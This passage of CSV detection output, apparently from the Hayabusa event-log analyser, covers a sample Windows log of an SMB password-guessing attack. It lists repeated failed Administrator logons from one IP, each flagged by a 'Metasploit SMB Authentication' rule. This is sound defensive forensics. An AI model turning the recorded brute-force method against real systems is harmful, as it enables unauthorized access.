SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: 
